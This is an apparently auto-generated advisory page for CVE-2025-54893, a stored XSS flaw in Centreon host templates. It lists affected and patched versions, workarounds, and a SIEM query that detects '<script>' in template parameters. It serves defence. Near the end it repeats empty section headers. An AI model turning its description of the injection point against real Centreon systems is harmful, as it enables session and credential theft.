CVE-2025-54893 – This stored XSS vulnerability in Centreon Infra... (How to Fix)

Q: What is the severity of CVE-2025-54893?

CVE-2025-54893 has a CVSS score of 6.8 (MEDIUM). This stored XSS vulnerability in Centreon Infra Monitoring allows authenticated users with elevated privileges to inject malicious scripts into host template configuration pages. When other users view these pages, the scripts execute in their browsers, potentially stealing credentials or performing unauthorized actions. Affected versions include 24.10.0-24.10.12, 24.04.0-24.04.17, and 23.10.0-23.10.27.

📋 TL;DR

This stored XSS vulnerability in Centreon Infra Monitoring allows authenticated users with elevated privileges to inject malicious scripts into host template configuration pages. When other users view these pages, the scripts execute in their browsers, potentially stealing credentials or performing unauthorized actions. Affected versions include 24.10.0-24.10.12, 24.04.0-24.04.17, and 23.10.0-23.10.27.

💻 Affected Systems

Products:

Centreon Infra Monitoring

Versions: 24.10.0 to 24.10.12, 24.04.0 to 24.04.17, 23.10.0 to 23.10.27

Operating Systems: Any OS running Centreon

Default Config Vulnerable: ⚠️ Yes

Notes: Only affects users with elevated privileges who can configure host templates.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Privileged attacker steals administrator credentials, gains full system control, and compromises the entire monitoring infrastructure.

🟠

Likely Case

Malicious insider or compromised privileged account steals session cookies, escalates privileges, or performs unauthorized configuration changes.

🟢

If Mitigated

Limited to data theft from users viewing infected pages, with no system compromise if proper input validation is in place.

🌐 Internet-Facing: MEDIUM - Requires authenticated privileged access, but internet-facing instances increase attack surface.

🏢 Internal Only: MEDIUM - Internal threat actors or compromised accounts can exploit this vulnerability.

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: MEDIUM

Requires authenticated privileged access and knowledge of XSS payloads.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 24.10.13, 24.04.18, 23.10.28

Vendor Advisory: https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54893-centreon-web-all-versions-medium-severity-5120

Restart Required: No

Instructions:

1. Backup your Centreon configuration. 2. Update to patched version via package manager or manual installation. 3. Verify update completed successfully.

🔧 Temporary Workarounds

Restrict Privileged Access

all

Limit host template configuration permissions to only essential administrators.

Implement WAF Rules

all

Deploy web application firewall rules to block XSS payloads in host template parameters.

🧯 If You Can't Patch

Implement strict input validation and output encoding for all host template fields
Enable Content Security Policy (CSP) headers to restrict script execution

🔍 How to Verify

Check if Vulnerable:

Check Centreon version via web interface or command line. If version falls within affected ranges, system is vulnerable.

Check Version:

centreon -v or check web interface About page

Verify Fix Applied:

Verify version is 24.10.13, 24.04.18, or 23.10.28 or higher. Test host template configuration for script injection.

📡 Detection & Monitoring

Log Indicators:

Unusual modifications to host templates
Suspicious characters in configuration parameters

Network Indicators:

Unexpected JavaScript in HTTP responses from host template pages

SIEM Query:

source="centreon" AND (event="template_modification" AND parameters CONTAINS "<script>")

📊 Metadata

CVE ID: CVE-2025-54893

CVSS v3 Score: 6.8 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

CWE: CWE-79

EPSS Score: 0.01% exploit probability (1.8th percentile)

Published: October 14, 2025

Last Updated: October 22, 2025

🔗 References

https://github.com/centreon/centreon/releases Release Notes
https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54893-centreon-web-all-versions-medium-severity-5120 Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-54893, you might also want to check these:

📋 TL;DR

💻 Affected Systems

📦 What is this software?

Centreon Web by Centreon

Centreon Web by Centreon

Centreon Web by Centreon

⚠️ Risk & Real-World Impact

Worst Case

Likely Case

If Mitigated

🎯 Exploit Status

🛠️ Fix & Mitigation

✅ Official Fix

Instructions:

🔧 Temporary Workarounds

Restrict Privileged Access

Implement WAF Rules

🧯 If You Can't Patch

🔍 How to Verify

Check if Vulnerable:

Check Version:

Verify Fix Applied:

📡 Detection & Monitoring

Log Indicators:

Network Indicators:

SIEM Query:

📊 Metadata

🔗 References

📤 Share & Export

🔗 Related Vulnerabilities